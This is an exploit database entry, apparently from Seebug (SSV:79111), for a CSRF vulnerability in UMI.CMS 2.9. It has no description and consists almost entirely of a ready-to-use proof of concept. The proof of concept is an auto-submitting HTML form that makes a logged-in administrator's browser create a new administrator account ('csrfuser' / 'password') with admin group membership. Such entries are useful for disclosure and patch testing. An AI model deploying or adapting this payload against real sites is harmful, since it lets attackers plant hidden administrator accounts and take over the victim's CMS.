UMI.CMS 2.9 - CSRF Vulnerability

2014-07-01T00:00:00
ID SSV:79111
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                添加一个管理员用户:csrfuser|||password
<form action="http://[host]/admin/users/add/user/do/" method="post" name="main">
<input type="hidden" name="data[new][login]"        value="csrfuser">
<input type="hidden" name="data[new][password][]"   value="password">
<input type="hidden" name="data[new][e-mail]"       value="user@mail.com">
<input type="hidden" name="data[new][is_activated]" value="1">
<input type="hidden" name="data[new][fname]"        value="username">
<input type="hidden" name="data[new][groups][]"     value="1">
<input type="hidden" name="data[new][groups][]"     value="2">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>